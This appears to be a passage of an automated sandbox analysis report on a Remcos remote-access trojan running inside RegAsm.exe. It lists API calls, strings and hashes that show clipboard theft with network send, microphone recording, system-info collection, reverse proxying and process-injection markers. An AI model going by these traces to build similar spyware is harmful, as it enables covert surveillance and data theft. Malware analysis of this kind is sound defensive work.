                            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                            • String ID: CloseChat$DisplayMessage$GetMessage
                            • API String ID: 2956720200-749203953
                            • Opcode ID: 4cad7ca28deb6409f2f78627fcedf8289f6fecf8c3360a11cdc8c366f959628d
                            • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                            • Opcode Fuzzy Hash: 4cad7ca28deb6409f2f78627fcedf8289f6fecf8c3360a11cdc8c366f959628d
                            • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                            APIs
                              • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                            • CloseHandle.KERNEL32(00000000), ref: 00417E20
                            • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                            • String ID: 0VG$0VG$<$@$Temp
                            • API String ID: 1704390241-2575729100
                            • Opcode ID: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                            • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                            • Opcode Fuzzy Hash: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                            • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                            APIs
                            • OpenClipboard.USER32 ref: 0041697C
                            • EmptyClipboard.USER32 ref: 0041698A
                            • CloseClipboard.USER32 ref: 00416990
                            • OpenClipboard.USER32 ref: 00416997
                            • GetClipboardData.USER32 ref: 004169A7
                            • GlobalLock.KERNEL32 ref: 004169B0
                            • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                            • CloseClipboard.USER32 ref: 004169BF
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                            • String ID: !D@
                            • API String ID: 2172192267-604454484
                            • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                            • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                            • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                            • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                            • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                            • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                            • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                            APIs
                            • _free.LIBCMT ref: 100059EA
                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                            • _free.LIBCMT ref: 100059F6
                            • _free.LIBCMT ref: 10005A01
                            • _free.LIBCMT ref: 10005A0C
                            • _free.LIBCMT ref: 10005A17
                            • _free.LIBCMT ref: 10005A22
                            • _free.LIBCMT ref: 10005A2D
                            • _free.LIBCMT ref: 10005A38
                            • _free.LIBCMT ref: 10005A43
                            • _free.LIBCMT ref: 10005A51
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                            • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                            • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                            • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                            APIs
                            • _free.LIBCMT ref: 004481B5
                              • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                              • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                            • _free.LIBCMT ref: 004481C1
                            • _free.LIBCMT ref: 004481CC
                            • _free.LIBCMT ref: 004481D7
                            • _free.LIBCMT ref: 004481E2
                            • _free.LIBCMT ref: 004481ED
                            • _free.LIBCMT ref: 004481F8
                            • _free.LIBCMT ref: 00448203
                            • _free.LIBCMT ref: 0044820E
                            • _free.LIBCMT ref: 0044821C
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                            • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                            • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                            • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Eventinet_ntoa
                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                            • API String ID: 3578746661-3604713145
                            • Opcode ID: bd8370f514910b19fded603290f8ef5501d6c574d4c225647a35800570e8c2ef
                            • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                            • Opcode Fuzzy Hash: bd8370f514910b19fded603290f8ef5501d6c574d4c225647a35800570e8c2ef
                            • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                            APIs
                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: DecodePointer
                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                            • API String ID: 3527080286-3064271455
                            • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                            • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                            • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                            • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                              • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                            • Sleep.KERNEL32(00000064), ref: 0041755C
                            • DeleteFileW.KERNEL32(00000000), ref: 00417590
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CreateDeleteExecuteShellSleep
                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                            • API String ID: 1462127192-2001430897
                            • Opcode ID: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
                            • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                            • Opcode Fuzzy Hash: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
                            • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                            APIs
                            • GetCurrentProcess.KERNEL32(00472B14,00000000,?,00003000,00000004,00000000,00000001), ref: 00407418
                            • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess
                            • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                            • API String ID: 2050909247-4242073005
                            • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                            • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                            • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                            • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                            APIs
                            • _strftime.LIBCMT ref: 00401D50
                              • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                            • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                            • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                            • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                            • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                            • API String ID: 3809562944-243156785
                            • Opcode ID: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                            • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                            • Opcode Fuzzy Hash: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                            • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                            • int.LIBCPMT ref: 00410EBC
                              • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                              • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                            • std::_Facet_Register.LIBCPMT ref: 00410EFC
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                            • __Init_thread_footer.LIBCMT ref: 00410F64
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                            • String ID: ,kG$0kG
                            • API String ID: 3815856325-2015055088
                            • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                            • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                            • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                            • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                            APIs
                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                            • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                            • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                            • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                            • waveInStart.WINMM ref: 00401CFE
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                            • String ID: dMG$|MG$PG
                            • API String ID: 1356121797-532278878
                            • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                            • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                            • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                            • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                              • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                              • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                              • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                            • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                            • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                            • TranslateMessage.USER32(?), ref: 0041D57A
                            • DispatchMessageA.USER32 ref: 0041D584
                            • GetMessageA.USER32 ref: 0041D591
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                            • String ID: Remcos
                            • API String ID: 1970332568-165870891
                            • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                            • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                            • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                            • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                            • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                            • Opcode Fuzzy Hash: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                            • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                            APIs
                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                            • __alloca_probe_16.LIBCMT ref: 00453F6A
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                            • __alloca_probe_16.LIBCMT ref: 00454014
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                              • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                            • __freea.LIBCMT ref: 00454083
                            • __freea.LIBCMT ref: 0045408F
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                            • String ID:
                            • API String ID: 201697637-0
                            • Opcode ID: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                            • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                            • Opcode Fuzzy Hash: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                            • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                            APIs
                              • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                            • _memcmp.LIBVCRUNTIME ref: 004454A4
                            • _free.LIBCMT ref: 00445515
                            • _free.LIBCMT ref: 0044552E
                            • _free.LIBCMT ref: 00445560
                            • _free.LIBCMT ref: 00445569
                            • _free.LIBCMT ref: 00445575
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorLast$_abort_memcmp
                            • String ID: C
                            • API String ID: 1679612858-1037565863
                            • Opcode ID: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                            • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                            • Opcode Fuzzy Hash: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                            • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: tcp$udp
                            • API String ID: 0-3725065008
                            • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                            • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                            • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                            • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                            APIs
                            • __Init_thread_footer.LIBCMT ref: 004018BE
                            • ExitThread.KERNEL32 ref: 004018F6
                            • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                              • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                            • String ID: PkG$XMG$NG$NG
                            • API String ID: 1649129571-3151166067
                            • Opcode ID: d03b4b87c98bc19dde34d1777c040e42b75bf9adce6b93ea1611c5cc13a7821a
                            • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                            • Opcode Fuzzy Hash: d03b4b87c98bc19dde34d1777c040e42b75bf9adce6b93ea1611c5cc13a7821a
                            • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                            APIs
                            • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                            • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            • CloseHandle.KERNEL32(00000000), ref: 00407A88
                            • MoveFileW.KERNEL32 ref: 00407AA5
                            • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                            • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                              • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                              • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
